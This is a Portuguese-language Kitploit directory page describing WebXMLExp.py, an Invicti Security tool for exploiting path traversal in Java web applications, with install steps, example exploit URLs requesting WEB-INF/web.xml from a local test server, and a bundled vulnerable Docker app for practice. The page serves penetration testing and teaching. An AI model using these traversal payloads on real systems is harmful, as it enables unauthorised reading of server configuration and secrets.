Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
web-inf-path-trav — Ferramenta para ajudar na exploração de vulnerabilidades de path traversal em aplicações web Java. | Kitploit
Ferramentas/GitHubGitHub/invicti-security/web-inf-path-trav
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosSegurança WebTestes de Penetração
GitHubinvicti-security/web-inf-path-trav

web-inf-path-trav

Ferramenta para ajudar na exploração de vulnerabilidades de path traversal em aplicações web Java.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
335há 3 anosRevisado pelo Kitploit

WebXMLExp.py

Ferramenta para auxiliar na exploração de vulnerabilidades de path traversal em aplicações web Java.

Esta ferramenta é referenciada no white paper da Invicti Security Explorando vulnerabilidades de path traversal em aplicações web Java.

Instalação

Python3 é necessário para esta ferramenta.

Execute o seguinte comando:

root@kitploit:~
pip install -r requirements.txt

Uso:

Após a instalação, forneça uma URL de exploit da seguinte forma:

root@kitploit:~
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>

Os resultados (arquivos baixados) estão disponíveis na pasta results.

Exemplos

root@kitploit:~
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"

Imagem docker de aplicação web vulnerável

Uma aplicação web vulnerável a uma vulnerabilidade de path traversal é fornecida na pasta docker.

Para iniciar, entre na pasta docker e execute:

root@kitploit:~
docker-compose up

A aplicação está acessível em http://127.0.0.1:8082/vulnerable/.

Para explorar a vulnerabilidade de path traversal, visite: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml

Baixar ferramenta